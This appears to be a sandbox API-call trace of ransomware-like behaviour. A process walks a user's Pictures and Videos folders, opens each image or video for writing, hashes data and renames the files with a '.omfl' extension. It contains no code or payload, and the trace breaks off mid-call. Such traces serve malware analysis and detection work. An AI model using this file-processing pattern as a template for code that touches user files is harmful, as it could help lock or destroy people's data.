(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\") returned="SqYhvBjGVsjCxavcn\\" [0134.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.481] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0134.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd312b8 [0134.481] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.481] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.481] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.481] PathFindFileNameW (pszPath="") returned="" [0134.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.481] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9afc0b10, ftCreationTime.dwHighDateTime=0x1d5e0d6, ftLastAccessTime.dwLowDateTime=0x2169c50, ftLastAccessTime.dwHighDateTime=0x1d5e43a, ftLastWriteTime.dwLowDateTime=0x2169c50, ftLastWriteTime.dwHighDateTime=0x1d5e43a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.481] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\3C6kGBiN41rKzcC.bmp") returned=".bmp" [0134.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\3C6kGBiN41rKzcC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\3c6kgbin41rkzcc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.482] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=97276) returned 1 [0134.482] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.486] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.487] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.487] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.487] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.487] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.487] GetLastError () returned 0x0 [0134.487] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.487] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.487] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.487] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.487] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.489] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\3C6kGBiN41rKzcC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\3c6kgbin41rkzcc.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\3C6kGBiN41rKzcC.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\3c6kgbin41rkzcc.bmp.omfl")) returned 1 [0134.490] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\FtLHsmH_MkhhFzkLy5m.bmp") returned=".bmp" [0134.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\FtLHsmH_MkhhFzkLy5m.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ftlhsmh_mkhhfzkly5m.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.491] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=14785) returned 1 [0134.491] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.494] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.495] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.495] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.495] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.495] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.495] GetLastError () returned 0x0 [0134.495] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.495] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.495] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.495] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.495] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.496] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\FtLHsmH_MkhhFzkLy5m.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ftlhsmh_mkhhfzkly5m.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\FtLHsmH_MkhhFzkLy5m.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ftlhsmh_mkhhfzkly5m.bmp.omfl")) returned 1 [0134.498] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\gkOe2 sW.gif") returned=".gif" [0134.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\gkOe2 sW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\gkoe2 sw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.498] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=75171) returned 1 [0134.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.502] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.503] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.503] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.503] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.503] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.503] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.503] GetLastError () returned 0x0 [0134.503] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.503] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.504] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.504] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.504] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.504] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.505] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\gkOe2 sW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\gkoe2 sw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\gkOe2 sW.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\gkoe2 sw.gif.omfl")) returned 1 [0134.507] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\UCUg.gif") returned=".gif" [0134.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\UCUg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ucug.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.507] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=80945) returned 1 [0134.507] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.533] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.534] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.534] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.534] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.534] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.535] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.535] GetLastError () returned 0x0 [0134.535] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.535] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.535] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.535] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.535] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.535] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.536] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\UCUg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ucug.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\UCUg.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ucug.gif.omfl")) returned 1 [0134.538] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\Ur1W82bNNb9ppvuG-g.png") returned=".png" [0134.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\Ur1W82bNNb9ppvuG-g.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ur1w82bnnb9ppvug-g.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.539] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=67197) returned 1 [0134.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.542] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.545] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.545] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.545] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.545] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.545] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.545] GetLastError () returned 0x0 [0134.545] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.545] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.545] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.545] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.545] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.545] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.546] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\Ur1W82bNNb9ppvuG-g.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ur1w82bnnb9ppvug-g.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\Ur1W82bNNb9ppvuG-g.png.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\ur1w82bnnb9ppvug-g.png.omfl")) returned 1 [0134.548] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\xVKN1XURDQ.bmp") returned=".bmp" [0134.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\xVKN1XURDQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\xvkn1xurdq.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.549] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=97534) returned 1 [0134.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.553] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.554] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.554] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.554] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.554] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.554] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.554] GetLastError () returned 0x0 [0134.554] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.554] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.554] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.554] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.554] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.554] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.556] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\xVKN1XURDQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\xvkn1xurdq.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\xVKN1XURDQ.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\xvkn1xurdq.bmp.omfl")) returned 1 [0134.558] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\yhWjqzlTnqTyjuXNU.jpg") returned=".jpg" [0134.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\yhWjqzlTnqTyjuXNU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\yhwjqzltnqtyjuxnu.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.558] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=12307) returned 1 [0134.558] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.561] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0134.562] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.562] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.562] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.562] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0134.562] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.562] GetLastError () returned 0x0 [0134.562] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.562] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0134.563] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.563] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0134.563] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.563] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\yhWjqzlTnqTyjuXNU.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\yhwjqzltnqtyjuxnu.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\nfvg7ITf\\yhWjqzlTnqTyjuXNU.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\nfvg7itf\\yhwjqzltnqtyjuxnu.jpg.omfl")) returned 1 [0134.565] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.565] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0134.565] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.565] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0134.565] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\") returned="70hip\\" [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0134.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\") returned="aQuqK8QzpcTyT\\" [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd314b0 [0134.566] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.566] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.566] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.566] PathFindFileNameW (pszPath="") returned="" [0134.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0134.566] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d458d50, ftCreationTime.dwHighDateTime=0x1d5d820, ftLastAccessTime.dwLowDateTime=0x17e48070, ftLastAccessTime.dwHighDateTime=0x1d5d980, ftLastWriteTime.dwLowDateTime=0x17e48070, ftLastWriteTime.dwHighDateTime=0x1d5d980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.566] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\1I6n.mp4") returned=".mp4" [0134.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\70hip\\1I6n.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\70hip\\1i6n.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.567] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=65718) returned 1 [0134.567] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.570] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 